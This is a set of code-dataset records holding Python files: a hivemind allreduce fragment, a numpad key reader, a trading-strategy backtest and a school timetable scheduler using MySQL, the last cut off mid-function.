asyncio.create_task(self._send_error_to_peer(peer_endpoint, code))\n raise\n\n async def accumulate_part_streaming(self, source: Endpoint, stream_messages: Iterable[runtime_pb2.Tensor]\n ) -> Iterable[runtime_pb2.Tensor]:\n \"\"\" accumulate_part using streams of serialized tensors. 
Used to prevent duplicate work in serialization \"\"\"\n tensor_part: torch.Tensor = deserialize_torch_tensor(combine_from_streaming(stream_messages))\n averaged_part = await self.accumulate_part(source, tensor_part)\n if not self.averaged_part_stream.done():\n serialized_tensor = serialize_torch_tensor(averaged_part, self.compression_type, allow_inplace=False)\n stream_chunks = tuple(split_for_streaming(serialized_tensor, self.chunk_size_bytes))\n self.averaged_part_stream.set_result(stream_chunks)\n return stream_chunks\n else:\n return self.averaged_part_stream.result()\n\n async def rpc_aggregate_part(self, stream: AsyncIterator[averaging_pb2.AveragingData], context: grpc.ServicerContext\n ) -> AsyncIterator[averaging_pb2.AveragingData]:\n \"\"\" a groupmate sends us a part of his tensor; we should average it with other peers and return the result \"\"\"\n request: averaging_pb2.AveragingData = await anext(stream)\n\n if request.group_id != self.group_id:\n yield averaging_pb2.AveragingData(code=averaging_pb2.BAD_GROUP_ID)\n\n elif request.code == averaging_pb2.PART_FOR_AVERAGING:\n try:\n tensor_chunks = (request.tensor_part, *[msg.tensor_part async for msg in stream])\n averaged_chunks = iter(await self.accumulate_part_streaming(request.endpoint, tensor_chunks))\n yield averaging_pb2.AveragingData(code=averaging_pb2.AVERAGED_PART, tensor_part=next(averaged_chunks))\n for averaged_chunk in averaged_chunks:\n yield averaging_pb2.AveragingData(tensor_part=averaged_chunk)\n\n except Exception as e:\n self.set_exception(e)\n yield averaging_pb2.AveragingData(code=averaging_pb2.INTERNAL_ERROR)\n else:\n error_code = averaging_pb2.MessageCode.Name(request.code)\n logger.debug(f\"{self} - peer {request.endpoint} sent {error_code}, allreduce cannot continue\")\n self.set_exception(AllreduceException(f\"peer {request.endpoint} sent {error_code}.\"))\n yield averaging_pb2.AveragingData(code=averaging_pb2.INTERNAL_ERROR)\n\n\ndef split_into_parts(tensors: Sequence[torch.Tensor], part_sizes: Tuple[int]) -> Tuple[torch.Tensor, ...]:\n \"\"\" combines averaged_tensors into one tensor and splits them into equal chunks of size group_size \"\"\"\n flat_tensor = torch.cat(tuple(map(torch.Tensor.flatten, tensors)))\n return torch.split_with_sizes(flat_tensor, part_sizes, dim=0)\n\n\ndef restore_from_parts(chunks: Sequence[torch.Tensor], shapes: Sequence[torch.Size]) -> Tuple[torch.Tensor, ...]:\n \"\"\" restores the original tensor shapes from chunks obtained by split_into_chunks \"\"\"\n flat_tensor = torch.cat(tuple(chunks))\n result_sizes = tuple(map(torch.Size.numel, shapes))\n flat_original_tensors = torch.split_with_sizes(flat_tensor, result_sizes)\n return tuple(map(torch.Tensor.reshape, flat_original_tensors, shapes))\n\n\nclass AllreduceException(Exception):\n \"\"\" A special exception that is raised when allreduce can't continue normally (e.g. disbanded/bad request/etc) \"\"\"\n","sub_path":"hivemind/client/averaging/allreduce.py","file_name":"allreduce.py","file_ext":"py","file_size_in_byte":13771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
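Note: the split_into_parts / restore_from_parts helpers at the end of the record above form an exact round trip: every tensor is flattened into one vector, the vector is cut into per-peer chunks, and the chunks are later reassembled into the original shapes. A minimal, hivemind-free sketch of that invariant (tensor values and part sizes are illustrative):

import torch

def split_into_parts(tensors, part_sizes):
    # flatten everything into one vector, then cut it into per-peer chunks
    flat = torch.cat([t.flatten() for t in tensors])
    return torch.split_with_sizes(flat, list(part_sizes), dim=0)

def restore_from_parts(chunks, shapes):
    # concatenate the chunks back and reshape to the original tensor shapes
    flat = torch.cat(list(chunks))
    pieces = torch.split_with_sizes(flat, [s.numel() for s in shapes])
    return tuple(p.reshape(s) for p, s in zip(pieces, shapes))

tensors = [torch.randn(2, 3), torch.randn(4)]          # 10 elements in total
parts = split_into_parts(tensors, (6, 4))              # e.g. two peers, sizes 6 and 4
restored = restore_from_parts(parts, [t.shape for t in tensors])
assert all(torch.equal(a, b) for a, b in zip(tensors, restored))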
+{"seq_id":"514904761","text":"#!/usr/bin/env python3\nfrom evdev import ecodes, InputDevice, categorize\n\nnumpad = InputDevice('/dev/input/event0')\nprint(numpad)\nnumpad.grab()\nfor event in numpad.read_loop():\n if event.type == ecodes.EV_KEY:\n press = categorize(event)\n if press.keystate == 1:\n print(press.keycode)\n \n","sub_path":"get-typing.py","file_name":"get-typing.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"245353106","text":"from util import get_data\nimport datetime as dt\nimport pandas as pd\nimport numpy as np\nfrom marketsimcode import compute_portvals\nimport matplotlib.pyplot as plt\nfrom indicators import sma, bb\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n\ndef author():\n return 'akarthik3'\n\ndef testPolicy(symbol = 'JPM', sd = dt.datetime(2008, 1, 1), ed = dt.datetime(2009, 12, 31), sv = 100000):\n prices = get_data([symbol], pd.date_range(sd, ed))[symbol]\n\n priceSMA = prices / sma(prices)\n BB = bb(prices)\n\n # Decide order types based on price-to-SMA ratio and calculated Bollinger value\n orders = prices.copy()\n orders[:] = 0\n orders[(priceSMA > 1.02) & (BB > 1)] = -1\n orders[(priceSMA < 0.98) & (BB < 0)] = 1\n\n trades = []\n for date in orders.index: trades.append((date, orders.loc[date] * 1000))\n\n tradesDataframe = pd.DataFrame(trades, columns = [\"Date\", \"Shares\"])\n tradesDataframe.set_index(\"Date\", inplace = True)\n\n return tradesDataframe\n\nif __name__ == \"__main__\":\n benchmarkPrices = get_data(['JPM'], pd.date_range(dt.datetime(2008, 1, 1), dt.datetime(2009, 12, 31)))['JPM']\n # benchmarkPrices = get_data(['JPM'], pd.date_range(dt.datetime(2010, 1, 1), dt.datetime(2011, 12, 31)))['JPM']\n\n benchmarkTrades = np.zeros(len(benchmarkPrices.index))\n benchmarkTrades[0] = 1000\n benchmarkTrades = pd.DataFrame(data = benchmarkTrades, index = benchmarkPrices.index, columns = ['Shares'])\n\n benchmarkPortvals, benchmarkCR, benchmarkMean, benchmarkSTD = compute_portvals(benchmarkTrades, 100000, 0.0, 0.0)\n normalizedBenchmark = benchmarkPortvals / benchmarkPortvals.iloc[0]\n\n trades = testPolicy()\n # trades = testPolicy(sd = dt.datetime(2010, 1, 1), ed = dt.datetime(2011, 12, 31))\n\n optimalPortvals, optimalCR, optimalMean, optimalSTD = compute_portvals(trades, 100000, 0.0, 0.0)\n normalizedOptimal = optimalPortvals / optimalPortvals.iloc[0]\n\n print(\"Benchmark CR: \", benchmarkCR)\n print(\"Benchmark ADR: \", benchmarkMean)\n print(\"Benchmark SDDR: \", benchmarkSTD)\n print(\"Optimal CR: \", optimalCR)\n print(\"Optimal ADR: \", optimalMean)\n print(\"Optimal SDDR: \", optimalSTD)\n\n plt.title(\"Benchmark vs. Manual Strategy\")\n plt.xlabel(\"Dates\")\n plt.ylabel(\"Normalized Value of Portfolio\")\n plt.plot(normalizedBenchmark, 'g', label=\"Benchmark\")\n plt.plot(normalizedOptimal, 'r', label = \"Manual\")\n plt.legend()\n\n prev = 0\n for day, order in trades.iterrows():\n if order['Shares'] - prev < 0 and order['Shares'] < 0: # SHORT\n plt.axvline(day, color = \"k\", alpha = 0.5)\n elif order['Shares'] - prev > 0 and order['Shares'] > 0: # LONG\n plt.axvline(day, color = \"b\", alpha = 0.5)\n prev = order['Shares']\n\n plt.savefig(\"Manual.png\")\n # plt.savefig(\"ManualOutOfSample.png\")\n plt.clf()","sub_path":"manual_strategy/ManualStrategy.py","file_name":"ManualStrategy.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"261396806","text":"import pymysql\n\ndef call_data():\n\n\t#------------------------------------------------------------------------------#\n\tnum = 0\n\tteacher_name = []\n\ttry:\n\t\tconn = pymysql.connect(host='localhost', user='root', db='schedule')\n\t\tcur = conn.cursor()\n\n\t\ttry:\n\t\t\tsql ='SELECT * FROM `table_account`'\n\t\t\tnum = cur.execute(sql)\n\t\t\t#print (\"num: \",num)\n\t\t\tdata = cur.fetchall()\n\t\t\t#print (data)\n\t\t\tconn.close()\n\n\t\texcept:\n\t\t\tprint ('Error')\n\n\texcept pymysql.Error:\n\t\tprint ('Connection Failed!!')\n\n\tfor i in range(num):\n\t\tteacher_name.append(data[i][1])\n\t#for i in teacher_name:\n\t#\tprint (i)\n\n\t#------------------------------------------------------------------------------#\n\tnum = 0\n\tteacher_busy = [[]for i in range(len(teacher_name))]\n\ttry:\n\t\tconn = pymysql.connect(host='localhost', user='root', db='schedule')\n\t\tcur = conn.cursor()\n\n\t\ttry:\n\t\t\tsql ='SELECT * FROM `table_teacher`'\n\t\t\tnum = cur.execute(sql)\n\t\t\t#print (\"num: \",num)\n\t\t\tdata = cur.fetchall()\n\t\t\t#print (data)\n\t\t\tconn.close()\n\n\t\texcept:\n\t\t\tprint ('Error')\n\n\texcept pymysql.Error:\n\t\tprint ('Connection Failed!!')\n\n\tfor i in range(len(teacher_name)):\n\t\tfor o in range(num):\n\t\t\tif teacher_name[i] == data[o][1]:\n\t\t\t\tteacher_busy[i].append(data[o][2]+data[o][3])\n\t#for i in teacher_busy:\n\t#\tprint (i)\n\n\t#------------------------------------------------------------------------------#\n\tnum = 0\n\tnum1 = 0\n\tdata = []\n\tsubject_description = []\n\ttry:\n\t\tconn = pymysql.connect(host='localhost', user='root', db='schedule')\n\t\tcur = conn.cursor()\n\n\t\ttry:\n\t\t\tsql ='SELECT * FROM `table_subject_description_output` ORDER BY `table_subject_description_output`.`subject_code` ASC'\n\t\t\tnum = cur.execute(sql)\n\n\t\t\tsql ='SELECT * FROM `table_subject_description_input`'\n\t\t\tnum = cur.execute(sql)\n\t\t\t#print (\"num: \",num)\n\t\t\tdata = cur.fetchall()\n\t\t\t#print (data)\n\n\t\t\tsql ='SELECT * FROM `table_teacher_subject`'\n\t\t\tnum1 = cur.execute(sql)\n\t\t\t#print (\"num: \",num1)\n\t\t\tdata1 = cur.fetchall()\n\t\t\t#print (data1)\n\t\t\tconn.close()\n\n\t\texcept:\n\t\t\tprint ('Error')\n\n\texcept pymysql.Error:\n\t\tprint ('Connection Failed!!')\n\n\tfor i in data:\n\t\tsub = []\n\t\tteacher = \"\"\n\t\tfor o in data1:\n\t\t\tif i[2] == o[2]:\n\t\t\t\tteacher = teacher + o[1] + \",\"\n\t\t\t\t#print (o[1]+\"_\"+o[2])\n\t\tif teacher == \"\":\n\t\t\tteacher = \"teacher,\"\n\t\tsub.append(i[2])\n\t\tsub.append(i[1])\n\t\tsub.append(teacher)\n\t\tsub.append(i[5])\n\t\tsub.append(i[6])\n\t\tsub.append(i[7])\n\t\tsubject_description.append(sub)\n\t#for i in subject_description:\n\t#\tprint (i)\n\n\t#------------------------------------------------------------------------------#\n\tnum = 0\n\tcenter_subject = []\n\ttry:\n\t\tconn = pymysql.connect(host='localhost', user='root', db='schedule')\n\t\tcur = conn.cursor()\n\n\t\ttry:\n\t\t\tsql ='SELECT * FROM `table_fundamental_subjects`'\n\t\t\tnum = cur.execute(sql)\n\t\t\t#print (\"num: \",num)\n\t\t\tdata = cur.fetchall()\n\t\t\t#print (data)\n\t\t\tconn.close()\n\n\t\texcept:\n\t\t\tprint ('Error')\n\n\texcept pymysql.Error:\n\t\tprint ('Connection Failed!!')\n\n\tfor i in data:\n\t\ttime = []\n\t\tt1 = i[6]+i[7]\n\t\tt2 = i[6]+i[8]\n\t\tif t1 == t2:\n\t\t\ttime.append(t1)\n\t\telif int(i[7])+1 == int(i[8]):\n\t\t\ttime.append(t1)\n\t\t\ttime.append(t2)\n\t\telif int(i[7])+2 == int(i[8]):\n\t\t\tt = 
int(i[7])+1\n\t\t\ttime.append(t1)\n\t\t\ttime.append(i[6]+str(t))\n\t\t\ttime.append(t2)\n\t\tsplit_center = []\n\t\tsplit_center.append(i[2])\n\t\tsplit_center.append(i[1])\n\t\tsplit_center.append(i[5])\n\t\tsplit_center.append(time)\n\t\tcenter_subject.append(split_center)\n\t#for i in center_subject:\n\t#\tprint (i)\n\n\t#------------------------------------------------------------------------------#\n\tnum = 0\n\troom_code = []\n\ttry:\n\t\tconn = pymysql.connect(host='localhost', user='root', db='schedule')\n\t\tcur = conn.cursor()\n\n\t\ttry:\n\t\t\tsql ='SELECT * FROM `table_room`'\n\t\t\tnum = cur.execute(sql)\n\t\t\t#print (\"num: \",num)\n\t\t\tdata = cur.fetchall()\n\t\t\t#print (data)\n\t\t\tconn.close()\n\n\t\texcept:\n\t\t\tprint ('Error')\n\n\texcept pymysql.Error:\n\t\tprint ('Connection Failed!!')\n\n\tfor i in range(num):\n\t\troom_code.append(data[i][1])\n\t#for i in room_code:\n\t#\tprint (i)\n\n\t#------------------------------------------------------------------------------#\n\n\tlst_data = [teacher_name,teacher_busy,subject_description,center_subject,room_code]\n\n\treturn (lst_data)\n\ndef save_output(output):\n\tset_data = []\n\tcount = 0\n\tfor i in output[0]:\n\t\tday0 = 0\n\t\tday1 = 0\n\t\tday2 = 0\n\t\tday3 = 0\n\t\tday4 = 0\n\t\tcheck_day0 = 0\n\t\tcheck_day1 = 0\n\t\tcheck_day2 = 0\n\t\tcheck_day3 = 0\n\t\tcheck_day4 = 0\n\t\tstart_time = []\n\t\tday = []\n\t\tfor o in range(len(i[6])):\n\t\t\tif i[6][o][0] == \"0\":\n\t\t\t\tday0 += 1\n\t\t\t\tif check_day0 == 0:\n\t\t\t\t\tcheck_day0 = 1\n\t\t\t\t\tstart_time.append(i[6][o])\n\t\t\telif i[6][o][0] == \"1\":\n\t\t\t\tday1 += 1\n\t\t\t\tif check_day1 == 0:\n\t\t\t\t\tcheck_day1 = 1\n\t\t\t\t\tstart_time.append(i[6][o])\n\t\t\telif i[6][o][0] == \"2\":\n\t\t\t\tday2 += 1\n\t\t\t\tif check_day2 == 0:\n\t\t\t\t\tcheck_day2 = 1\n\t\t\t\t\tstart_time.append(i[6][o])\n\t\t\telif i[6][o][0] == \"3\":\n\t\t\t\tday3 += 1\n\t\t\t\tif check_day3 == 0:\n\t\t\t\t\tcheck_day3 = 1\n\t\t\t\t\tstart_time.append(i[6][o])\n\t\t\telif i[6][o][0] == \"4\":\n\t\t\t\tday4 += 1\n\t\t\t\tif check_day4 == 0:\n\t\t\t\t\tcheck_day4 = 1\n\t\t\t\t\tstart_time.append(i[6][o])\n\n\t\tsum_day = [day0,day1,day2,day3,day4]\n\t\tfor a in sum_day:\n\t\t\tif a != 0:\n\t\t\t\tday.append(a)\n\n\t\tfor o in range(len(day)):\n\t\t\tcount += 1\n\t\t\tsplit_data = []\n\t\t\tsplit_data.append(count)\n\t\t\tsplit_data.append(i[1])\n\t\t\tsplit_data.append(i[0])\n\t\t\tsplit_data.append(i[5])\n\t\t\tsplit_data.append(i[3])\n\t\t\tsplit_data.append(day[o])\n\t\t\tif i[4][0] == i[4][1]:\n\t\t\t\tsplit_data.append(i[4][0])\n\t\t\telse :\n\t\t\t\tsplit_data.append(i[4])\n\t\t\tsplit_data.append(start_time[o][0])\n\t\t\tsplit_data.append(start_time[o][1])\n\t\t\tset_data.append(split_data)\n\t\t\t#print (split_data)\n\n\tfor i in output[1]:\n\t\tday0 = 0\n\t\tday1 = 0\n\t\tday2 = 0\n\t\tday3 = 0\n\t\tday4 = 0\n\t\tcheck_day0 = 0\n\t\tcheck_day1 = 0\n\t\tcheck_day2 = 0\n\t\tcheck_day3 = 0\n\t\tcheck_day4 = 0\n\t\tstart_time = []\n\t\tday = []\n\t\tfor o in range(len(i[3])):\n\t\t\tif i[3][o][0] == \"0\":\n\t\t\t\tday0 += 1\n\t\t\t\tif check_day0 == 0:\n\t\t\t\t\tcheck_day0 = 1\n\t\t\t\t\tstart_time.append(i[3][o])\n\t\t\telif i[3][o][0] == \"1\":\n\t\t\t\tday1 += 1\n\t\t\t\tif check_day1 == 0:\n\t\t\t\t\tcheck_day1 = 1\n\t\t\t\t\tstart_time.append(i[3][o])\n\t\t\telif i[3][o][0] == \"2\":\n\t\t\t\tday2 += 1\n\t\t\t\tif check_day2 == 0:\n\t\t\t\t\tcheck_day2 = 1\n\t\t\t\t\tstart_time.append(i[3][o])\n\t\t\telif i[3][o][0] == \"3\":\n\t\t\t\tday3 += 
1\n\t\t\t\tif check_day3 == 0:\n\t\t\t\t\tcheck_day3 = 1\n\t\t\t\t\tstart_time.append(i[3][o])\n\t\t\telif i[3][o][0] == \"4\":\n\t\t\t\tday4 += 1\n\t\t\t\tif check_day4 == 0:\n\t\t\t\t\tcheck_day4 = 1\n\t\t\t\t\tstart_time.append(i[3][o])\n\n\t\tsum_day = [day0,day1,day2,day3,day4]\n\t\tfor a in sum_day:\n\t\t\tif a != 0:\n\t\t\t\tday.append(a)\n\n\t\tfor o in range(len(day)):\n\t\t\tcount += 1\n\t\t\tsplit_data = []\n\t\t\tsplit_data.append(count)\n\t\t\tsplit_data.append(i[1])\n\t\t\tsplit_data.append(i[0])\n\t\t\tsplit_data.append(\"-\")\n\t\t\tsplit_data.append(\"-\")\n\t\t\tsplit_data.append(day[o])\n\t\t\tif i[2][0] == i[2][1]:\n\t\t\t\tsplit_data.append(i[2][0])\n\t\t\telse :\n\t\t\t\tsplit_data.append(i[2])\n\t\t\tsplit_data.append(start_time[o][0])\n\t\t\tsplit_data.append(start_time[o][1])\n\t\t\tset_data.append(split_data)\n\t\t\t#print (split_data)\n\n\ttry:\n\t\tconn = pymysql.connect(host='localhost', user='root', db='schedule')\n\t\tcur = conn.cursor()\n\n\t\ttry:\n\t\t\tsql = \"DROP TABLE IF EXISTS `table_subject_description_output`\"\n\t\t\tcur.execute(sql)\n\t\n\t\t\tsql = \"\"\"CREATE TABLE IF NOT EXISTS `table_subject_description_output` (\n\t\t\t `No` int(100) NOT NULL,\n\t\t\t `subject_level` varchar(100) NOT NULL,\n\t\t\t `subject_code` varchar(100) NOT NULL,\n\t\t\t `subject_room` varchar(100) NOT NULL,\n\t\t\t `subject_hour_per_week` varchar(100) NOT NULL,\n\t\t\t `subject_hour_per_day` varchar(100) NOT NULL,\n\t\t\t `subject_sec` varchar(100) NOT NULL,\n\t\t\t `Day` varchar(100) NOT NULL,\n\t\t\t `start_time` varchar(100) NOT NULL\n\t\t\t) ENGINE=InnoDB DEFAULT CHARSET=utf8;\"\"\"\n\t\t\tcur.execute(sql)\n\n\t\t\tfor i in set_data:\n\t\t\t\tNo = i[0]\n\t\t\t\tsubject_level = i[1]\n\t\t\t\tsubject_code = i[2]\n\t\t\t\tsubject_room = i[3]\n\t\t\t\tsubject_hour_per_week = i[4]\n\t\t\t\tsubject_hour_per_day = i[5]\n\t\t\t\tsubject_sec = i[6]\n\t\t\t\tDay = i[7]\n\t\t\t\tstart_time = i[8]\n\t\t\t\tsql = \"\"\"INSERT INTO `table_subject_description_output` (`No`, `subject_level`, `subject_code`, `subject_room`, `subject_hour_per_week`, `subject_hour_per_day`, `subject_sec`, `Day`, `start_time`)\n\t\t\t\t\t\tVALUES ('%s','%s','%s','%s','%s','%s','%s','%s','%s')\"\"\" %(No,subject_level,subject_code,subject_room,subject_hour_per_week,subject_hour_per_day,subject_sec,Day,start_time)\n\t\t\t\tcur.execute(sql)\n\t\t\tconn.commit()\n\t\t\tconn.close()\n\n\t\texcept:\n\t\t\tprint ('Error')\n\n\texcept pymysql.Error:\n\t\tprint ('Connection Failed!!')\n\ndef print_timetable(table,name):\n\ts = \" | \"\n\td = 0\n\tfor A in table:\n\t\td += 1\n\t\tprint (str(d)+\")\"+name[d-1]+\"\\n\")\n\t\tprint (\"|-----|---------------------------------------------------------------------------------------------------------------------------------|\")\n\t\tprint (\"| | TIME |\")\n\t\tprint (\"| DAY |---------------------------------------------------------------------------------------------------------------------------------|\")\n\t\tprint (\"| |08.30-09.30 |09.30-10.30 |10.30-11.30 |11.30-12.30 |12.30-13.30 |13.30-14.30 |14.30-15.30 |15.30-16.30 |16.30-17.30 |17.30-18.30 |\")\n\t\tprint (\"|-----|------------|------------|------------|------------|------------|------------|------------|------------|------------|------------|\")\n\t\tprint (\"| MON | \"+A[0][0]+s+A[0][1]+s+A[0][2]+s+A[0][3]+s+A[0][4]+s+A[0][5]+s+A[0][6]+s+A[0][7]+s+A[0][8]+s+A[0][9]+\" |\")\n\t\tprint 
(\"|-----|------------|------------|------------|------------|------------|------------|------------|------------|------------|------------|\")\n\t\tprint (\"| TUE | \"+A[1][0]+s+A[1][1]+s+A[1][2]+s+A[1][3]+s+A[1][4]+s+A[1][5]+s+A[1][6]+s+A[1][7]+s+A[1][8]+s+A[1][9]+\" |\")\n\t\tprint (\"|-----|------------|------------|------------|------------|------------|------------|------------|------------|------------|------------|\")\n\t\tprint (\"| WED | \"+A[2][0]+s+A[2][1]+s+A[2][2]+s+A[2][3]+s+A[2][4]+s+A[2][5]+s+A[2][6]+s+A[2][7]+s+A[2][8]+s+A[2][9]+\" |\")\n\t\tprint (\"|-----|------------|------------|------------|------------|------------|------------|------------|------------|------------|------------|\")\n\t\tprint (\"| THU | \"+A[3][0]+s+A[3][1]+s+A[3][2]+s+A[3][3]+s+A[3][4]+s+A[3][5]+s+A[3][6]+s+A[3][7]+s+A[3][8]+s+A[3][9]+\" |\")\n\t\tprint (\"|-----|------------|------------|------------|------------|------------|------------|------------|------------|------------|------------|\")\n\t\tprint (\"| FRI | \"+A[4][0]+s+A[4][1]+s+A[4][2]+s+A[4][3]+s+A[4][4]+s+A[4][5]+s+A[4][6]+s+A[4][7]+s+A[4][8]+s+A[4][9]+\" |\")\n\t\tprint (\"|-----|------------|------------|------------|------------|------------|------------|------------|------------|------------|------------|\")\n\t\t#print (\"| SAT | FRA141 | FRA141 | FRA141 | FRA141 | FRA141 | FRA141 | FRA141 | FRA141 | FRA141 | FRA141 |\")\n\t\t#print (\"|-----|------------|------------|------------|------------|------------|------------|------------|------------|------------|------------|\")\n\t\tprint (\"\\n\")\ndef sub_do_not_use_this_time(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable):\n\tsubject_do_not_use_this_time = []\n\tsubject = subject_description[i]\n\tall_teacher = subject[2].split(\",\")\n\tFREE = \" \"\n\t#Check from teacher\n\tfor a in range(len(teacher_name)):\n\t\tfor b in range(len(all_teacher)-1): \n\t\t\tif all_teacher[b] == teacher_name[a]:\n\t\t\t\tfor o in range(5):\n\t\t\t\t\tfor u in range(10):\n\t\t\t\t\t\tif timetable_teacher[a][o][u] != FREE:\n\t\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t\t\tfor e in subject_do_not_use_this_time:\n\t\t\t\t\t\t\t\tif e == timetable[o][u]:\n\t\t\t\t\t\t\t\t\tcheck = 1\n\t\t\t\t\t\t\tif check == 0:\n\t\t\t\t\t\t\t\tsubject_do_not_use_this_time.append(timetable[o][u])\n\t\n\t#Check from MIX_SCHEDULE\n\tlevel = subject[1]\n\tif level == \"1\":\n\t\tA = MIX_SCHEDULE[0]\n\t\tB = MIX_SCHEDULE[1]\n\telif level == \"2\":\n\t\tA = MIX_SCHEDULE[2]\n\t\tB = MIX_SCHEDULE[3]\n\telif level == \"3\":\n\t\tA = MIX_SCHEDULE[4]\n\t\tB = MIX_SCHEDULE[5]\n\telif level == \"4\":\n\t\tA = MIX_SCHEDULE[6]\n\t\tB = MIX_SCHEDULE[7]\n\telif level == \"M\":\n\t\tC = MIX_SCHEDULE[8]\n\telif level == \"D\":\n\t\tC = MIX_SCHEDULE[9]\n\n\tfor o in range(5):\n\t\tfor u in range(10):\n\t\t\tcheck = 0\n\t\t\tfor e in subject_do_not_use_this_time:\n\t\t\t\tif e == timetable[o][u]:\n\t\t\t\t\tcheck = 1\n\t\t\tif check == 0:\n\t\t\t\tif subject[4] == \"AB\" and (A[o][u] != FREE or B[o][u] != FREE):\n\t\t\t\t\tsubject_do_not_use_this_time.append(timetable[o][u])\n\t\t\t\telif subject[4] == \"AA\" and A[o][u] != FREE:\n\t\t\t\t\tsubject_do_not_use_this_time.append(timetable[o][u])\n\t\t\t\telif subject[4] == \"BB\" and B[o][u] != FREE:\n\t\t\t\t\tsubject_do_not_use_this_time.append(timetable[o][u])\n\t\t\t\telif subject[4] == \"CC\" and C[o][u] != FREE:\n\t\t\t\t\tsubject_do_not_use_this_time.append(timetable[o][u])\n\t\n\t#Check from room_code\n\tfor a in 
range(len(room_code)):\n\t\tif subject[5] == room_code[a]:\n\t\t\tfor o in range(5):\n\t\t\t\tfor u in range(10):\n\t\t\t\t\tif timetable_room[a][o][u] != FREE:\n\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t\tfor e in subject_do_not_use_this_time:\n\t\t\t\t\t\t\tif e == timetable[o][u]:\n\t\t\t\t\t\t\t\tcheck = 1\n\t\t\t\t\t\tif check == 0:\n\t\t\t\t\t\t\tsubject_do_not_use_this_time.append(timetable[o][u])\n\n\tsubject_do_not_use_this_time = sorted(subject_do_not_use_this_time)\n\n\treturn (subject_do_not_use_this_time)\n\ndef manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable,subject_do_not_use_this_time = None):\n\tsubject = subject_description[i]\n\tall_teacher = subject[2].split(\",\")\n\tlevel = subject[1]\n\tsec = subject[4]\n\tsubject_do_not_use_this_time = []\n\tFREE = \" \"\n\tday = [\"0\",\"1\",\"2\",\"3\",\"4\"]\n\thr = [\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"]\n\thr_1 = [[\"1\"],[\"2\"],[\"3\"],[\"5\"],[\"6\"],[\"7\"],[\"8\"]]\n\thr_2 = [[\"0\",\"1\"],[\"1\",\"2\"],[\"2\",\"3\"],[\"5\",\"6\"],[\"6\",\"7\"],[\"7\",\"8\"]]\n\thr_3 = [[\"1\",\"2\",\"3\"],[\"5\",\"6\",\"7\"],[\"6\",\"7\",\"8\"]]\n\thr_3_1 = [[\"0\",\"1\",\"2\"],[\"4\",\"5\",\"6\"],[\"5\",\"6\",\"7\"],[\"6\",\"7\",\"8\"]]\n\n\tif level == \"1\":\n\t\tA = 0\n\t\tB = 1\n\telif level == \"2\":\n\t\tA = 2\n\t\tB = 3\n\telif level == \"3\":\n\t\tA = 4\n\t\tB = 5\n\telif level == \"4\":\n\t\tA = 6\n\t\tB = 7\n\telif level == \"M\":\n\t\tC = 8\n\telif level == \"D\":\n\t\tC = 9\n\n\t#Update MIX_SCHEDULE\n\tif len(subject[3]) == 1:\n\t\tT = [subject[3]]\n\telse:\n\t\tT = subject[3].split(\"/\")\n\n\tfor t in range(len(T)):\n\t\tfinish = 0\n\t\tcheck_freeday = 0\n\t\twhile finish != 5:\n\t\t\t#print (all_teacher)\n\t\t\tsubject_do_not_use_this_time = sub_do_not_use_this_time(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\t\tFREE_TIME = [[],[],[],[],[]]\n\n\t\t\t#print (str(t)+\"_\"+subject[0]+\"_\"+sec)\n\n\t\t\t\"\"\"if finish == 1 or finish == 2 :\n\t\t\t\tfor b in range(len(all_teacher)-1):\n\t\t\t\t\tfor a in range(len(teacher_name)):\n\t\t\t\t\t\tif all_teacher[b] == teacher_name[a]:\n\t\t\t\t\t\t\tprint (teacher_name[a])\n\t\t\t\t\t\t\tprint (\"\\n\")\n\t\t\t\t\t\t\tprint (timetable_teacher[a])\n\t\t\t\t\t\t\tprint (\"\\n\\n\")\n\t\t\t\tprint (subject_do_not_use_this_time)\n\n\t\t\tif all_teacher == [\"Mr.Bawornsak Sakulkueakulsuk\",\"\"]:\n\t\t\t\tfor a in range(len(teacher_name)):\n\t\t\t\t\tif all_teacher[0]==teacher_name[a]:\n\t\t\t\t\t\tprint (subject_do_not_use_this_time)\n\t\t\t\t\t\tprint (timetable_teacher[a])\"\"\"\n\n\t\t\tfor o in range(len(FREE_TIME)):\n\t\t\t\tfor u in range(10):\n\t\t\t\t\tFREE_TIME[o].append(timetable[o][u])\n\t\t\tfor a in range(len(FREE_TIME)):\n\t\t\t\tfor b in range(len(FREE_TIME[a])):\n\t\t\t\t\tfor c in subject_do_not_use_this_time:\n\t\t\t\t\t\tif c == FREE_TIME[a][b]:\n\t\t\t\t\t\t\tFREE_TIME[a][b] = \"xx\"\n\n\t\t\tFREE_TIME_SPRIT = [[],[],[],[],[]]\n\t\t\tFREE_TIME_GROUP = [[],[],[],[],[]]\n\t\t\tfor o in range(len(FREE_TIME)):\n\t\t\t\tif T[t] == \"1\":\n\t\t\t\t\tfor u in range(len(FREE_TIME[o])):\n\t\t\t\t\t\tsplit = []\n\t\t\t\t\t\tsplit.append(FREE_TIME[o][u][1])\n\t\t\t\t\t\tFREE_TIME_SPRIT[o].append(split)\n\t\t\t\t\tfor u in range(len(FREE_TIME_SPRIT)):\n\t\t\t\t\t\tfor v in FREE_TIME_SPRIT[u]:\n\t\t\t\t\t\t\tfor w in hr_1:\n\t\t\t\t\t\t\t\tif v == w:\n\t\t\t\t\t\t\t\t\tcheck = 
